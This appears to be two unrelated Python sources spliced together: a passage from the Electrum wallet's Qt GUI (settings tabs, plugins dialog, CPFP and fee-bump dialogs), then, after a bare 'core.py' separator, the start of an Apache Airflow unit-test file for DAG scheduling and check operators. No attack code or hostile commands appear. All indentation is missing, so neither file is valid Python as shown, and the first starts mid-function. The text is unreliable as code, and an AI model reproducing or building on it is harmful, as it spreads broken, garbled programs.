fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum.i18n import languages
lang_combo.addItems(list(languages.values()))
lang_keys = list(languages.keys())
lang_cur_setting = self.config.get("language", '')
try:
index = lang_keys.index(lang_cur_setting)
except ValueError: # not in list
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
msg = '\n'.join([
_('Time based: fee rate is based on average confirmation time estimates'),
_('Mempool based: fee rate is targeting a depth in the memory pool')
]
)
fee_type_label = HelpLabel(_('Fee estimation') + ':', msg)
fee_type_combo = QComboBox()
fee_type_combo.addItems([_('Static'), _('ETA'), _('Mempool')])
fee_type_combo.setCurrentIndex((2 if self.config.use_mempool_fees() else 1) if self.config.is_dynfee() else 0)
def on_fee_type(x):
self.config.set_key('mempool_fees', x==2)
self.config.set_key('dynamic_fees', x>0)
self.fee_slider.update()
fee_type_combo.currentIndexChanged.connect(on_fee_type)
fee_widgets.append((fee_type_label, fee_type_combo))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
use_rbf_cb = QCheckBox(_('Use Replace-By-Fee'))
use_rbf_cb.setChecked(self.config.get('use_rbf', True))
use_rbf_cb.setToolTip(
_('If you check this box, your transactions will be marked as non-final,') + '\n' + \
_('and you will have the possibility, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \
_('Note that some merchants do not accept non-final transactions until they are confirmed.'))
def on_use_rbf(x):
self.config.set_key('use_rbf', x == Qt.Checked)
use_rbf_cb.stateChanged.connect(on_use_rbf)
fee_widgets.append((use_rbf_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see https://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = base_units_list
msg = (_('Base unit of your wallet.')
+ '\n1 BTC = 1000 mBTC. 1 mBTC = 1000 bits. 1 bit = 100 sat.\n'
+ _('This setting affects the Send tab, and all balance related fields.'))
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
self.decimal_point = base_unit_name_to_decimal_point(unit_result)
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transactions fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
def on_outrounding(x):
self.config.set_key('coin_chooser_output_rounding', bool(x))
enable_outrounding = self.config.get('coin_chooser_output_rounding', False)
outrounding_cb = QCheckBox(_('Enable output value rounding'))
outrounding_cb.setToolTip(
_('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' +
_('This might improve your privacy somewhat.') + '\n' +
_('If enabled, at most 100 satoshis might be lost due to this, per transaction.'))
outrounding_cb.setChecked(enable_outrounding)
outrounding_cb.stateChanged.connect(on_outrounding)
tx_widgets.append((outrounding_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
hist_capgains_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_history_capgains_cb():
if not self.fx: return
hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config())
hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_list.refresh_headers()
if self.fx.is_enabled() and checked:
# reset timeout to get historical rates
self.fx.timeout = 0
update_history_capgains_cb()
def on_history_capgains(checked):
if not self.fx: return
self.fx.set_history_capital_gains_config(checked)
self.history_list.refresh_headers()
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_history_capgains_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
hist_capgains_checkbox.stateChanged.connect(on_history_capgains)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('Appearance')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.timeout = 0
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
name = descr['__name__']
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.print_msg("error: cannot display plugin", name)
traceback.print_exc(file=sys.stdout)
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
def f(x):
a = max_fee - fee_e.get_amount()
output_amount.setText((self.format_amount(a) + ' ' + self.base_unit()) if a else '')
fee_e.textChanged.connect(f)
fee = self.config.fee_per_kb() * total_size / 1000
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee' + ':')), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * total_size / 1000
fee = min(max_fee, fee)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label(tx.txid())
tx_size = tx.estimated_size()
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('Current fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('New fee' + ':')))
fee_e = BTCAmountEdit(self.get_decimal_point)
fee_e.setAmount(fee * 1.5)
vbox.addWidget(fee_e)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * tx_size / 1000
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee = fee_e.get_amount()
delta = new_fee - fee
if delta < 0:
self.show_error("fee too low")
return
try:
new_tx = self.wallet.bump_fee(tx, delta)
except CannotBumpFee as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx.txid(), tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.save_transactions(write=True)
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(":icons/offline_tx.png"), None, _('Success'), msg)
return True
|
core.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import json
import unittest
import bleach
import doctest
import mock
import multiprocessing
import os
import re
import signal
import sqlalchemy
import subprocess
import tempfile
import warnings
from datetime import timedelta
from dateutil.relativedelta import relativedelta
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from freezegun import freeze_time
from numpy.testing import assert_array_almost_equal
from six.moves.urllib.parse import urlencode
from time import sleep
from airflow import configuration
from airflow.executors import SequentialExecutor
from airflow.models import Variable
configuration.conf.load_test_config()
from airflow import jobs, models, DAG, utils, macros, settings, exceptions
from airflow.models import BaseOperator
from airflow.operators.bash_operator import BashOperator
from airflow.operators.check_operator import CheckOperator, ValueCheckOperator
from airflow.operators.dagrun_operator import TriggerDagRunOperator
from airflow.operators.python_operator import PythonOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.hooks.base_hook import BaseHook
from airflow.hooks.sqlite_hook import SqliteHook
from airflow.bin import cli
from airflow.www import app as application
from airflow.settings import Session
from airflow.utils import timezone
from airflow.utils.timezone import datetime
from airflow.utils.state import State
from airflow.utils.dates import infer_time_unit, round_time, scale_time_units
from lxml import html
from airflow.exceptions import AirflowException
from airflow.configuration import AirflowConfigException, run_command
from jinja2.sandbox import SecurityError
from jinja2 import UndefinedError
import six
NUM_EXAMPLE_DAGS = 20
DEV_NULL = '/dev/null'
TEST_DAG_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
DEFAULT_DATE = datetime(2015, 1, 1)
DEFAULT_DATE_ISO = DEFAULT_DATE.isoformat()
DEFAULT_DATE_DS = DEFAULT_DATE_ISO[:10]
TEST_DAG_ID = 'unit_tests'
try:
import cPickle as pickle
except ImportError:
# Python 3
import pickle
def reset(dag_id=TEST_DAG_ID):
session = Session()
tis = session.query(models.TaskInstance).filter_by(dag_id=dag_id)
tis.delete()
session.commit()
session.close()
reset()
class OperatorSubclass(BaseOperator):
"""
An operator to test template substitution
"""
template_fields = ['some_templated_field']
def __init__(self, some_templated_field, *args, **kwargs):
super(OperatorSubclass, self).__init__(*args, **kwargs)
self.some_templated_field = some_templated_field
def execute(*args, **kwargs):
pass
class CoreTest(unittest.TestCase):
default_scheduler_args = {"num_runs": 1}
def setUp(self):
configuration.conf.load_test_config()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
self.dag = DAG(TEST_DAG_ID, default_args=self.args)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.run_after_loop = self.dag_bash.get_task('run_after_loop')
self.run_this_last = self.dag_bash.get_task('run_this_last')
def test_schedule_dag_no_previous_runs(self):
"""
Tests scheduling a dag with no previous runs
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_previous_runs')
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag.clear()
def test_schedule_dag_fake_scheduled_previous(self):
"""
Test scheduling a dag where there is a prior DagRun
which has the same run_id as the next run should have
"""
delta = timedelta(hours=1)
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_fake_scheduled_previous',
schedule_interval=delta,
start_date=DEFAULT_DATE)
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=DEFAULT_DATE))
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
dag.create_dagrun(run_id=models.DagRun.id_for_date(DEFAULT_DATE),
execution_date=DEFAULT_DATE,
state=State.SUCCESS,
external_trigger=True)
dag_run = scheduler.create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
DEFAULT_DATE + delta,
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
def test_schedule_dag_once(self):
"""
Tests scheduling a dag scheduled for @once - should be scheduled the first time
it is called, and not scheduled the second.
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_once')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertIsNone(dag_run2)
dag.clear()
def test_fractional_seconds(self):
"""
Tests if fractional seconds are stored in the database
"""
dag = DAG(TEST_DAG_ID + 'test_fractional_seconds')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
start_date = timezone.utcnow()
run = dag.create_dagrun(
run_id='test_' + start_date.isoformat(),
execution_date=start_date,
start_date=start_date,
state=State.RUNNING,
external_trigger=False
)
run.refresh_from_db()
self.assertEqual(start_date, run.execution_date,
"dag run execution_date loses precision")
self.assertEqual(start_date, run.start_date,
"dag run start_date loses precision ")
def test_schedule_dag_start_end_dates(self):
"""
Tests that an attempt to schedule a task after the Dag's end_date
does not succeed.
"""
delta = timedelta(hours=1)
runs = 3
start_date = DEFAULT_DATE
end_date = start_date + (runs - 1) * delta
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_start_end_dates',
start_date=start_date,
end_date=end_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
# Create and schedule the dag runs
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_runs.append(scheduler.create_dag_run(dag))
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
@freeze_time('2016-01-01')
def test_schedule_dag_no_end_date_up_to_today_only(self):
"""
Tests that a Dag created without an end_date can only be scheduled up
to and including the current datetime.
For example, if today is 2016-01-01 and we are scheduling from a
start_date of 2015-01-01, only jobs up to, but not including
2016-01-01 should be scheduled.
"""
session = settings.Session()
delta = timedelta(days=1)
start_date = DEFAULT_DATE
runs = 365
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_end_date_up_to_today_only',
start_date=start_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_run = scheduler.create_dag_run(dag)
dag_runs.append(dag_run)
# Mark the DagRun as complete
dag_run.state = State.SUCCESS
session.merge(dag_run)
session.commit()
# Attempt to schedule an additional dag run (for 2016-01-01)
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_confirm_unittest_mod(self):
self.assertTrue(configuration.conf.get('core', 'unit_test_mode'))
def test_pickling(self):
dp = self.dag.pickle()
self.assertEqual(dp.pickle.dag_id, self.dag.dag_id)
def test_rich_comparison_ops(self):
class DAGsubclass(DAG):
pass
dag_eq = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_load_time = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_name = DAG(TEST_DAG_ID + '_neq', default_args=self.args)
dag_subclass = DAGsubclass(TEST_DAG_ID, default_args=self.args)
dag_subclass_diff_name = DAGsubclass(
TEST_DAG_ID + '2', default_args=self.args)
for d in [dag_eq, dag_diff_name, dag_subclass, dag_subclass_diff_name]:
d.last_loaded = self.dag.last_loaded
# test identity equality
self.assertEqual(self.dag, self.dag)
# test dag (in)equality based on _comps
self.assertEqual(dag_eq, self.dag)
self.assertNotEqual(dag_diff_name, self.dag)
self.assertNotEqual(dag_diff_load_time, self.dag)
# test dag inequality based on type even if _comps happen to match
self.assertNotEqual(dag_subclass, self.dag)
# a dag should equal an unpickled version of itself
d = pickle.dumps(self.dag)
self.assertEqual(pickle.loads(d), self.dag)
# dags are ordered based on dag_id no matter what the type is
self.assertLess(self.dag, dag_diff_name)
self.assertGreater(self.dag, dag_diff_load_time)
self.assertLess(self.dag, dag_subclass_diff_name)
# greater than should have been created automatically by functools
self.assertGreater(dag_diff_name, self.dag)
# hashes are non-random and match equality
self.assertEqual(hash(self.dag), hash(self.dag))
self.assertEqual(hash(dag_eq), hash(self.dag))
self.assertNotEqual(hash(dag_diff_name), hash(self.dag))
self.assertNotEqual(hash(dag_subclass), hash(self.dag))
def test_check_operators(self):
conn_id = "sqlite_default"
captainHook = BaseHook.get_hook(conn_id=conn_id)
captainHook.run("CREATE TABLE operator_test_table (a, b)")
captainHook.run("insert into operator_test_table values (1,2)")
t = CheckOperator(
task_id='check',
sql="select count(*) from operator_test_table",
conn_id=conn_id,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
t = ValueCheckOperator(
task_id='value_check',
pass_value=95,
tolerance=0.1,
conn_id=conn_id,
sql="SELECT 100",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
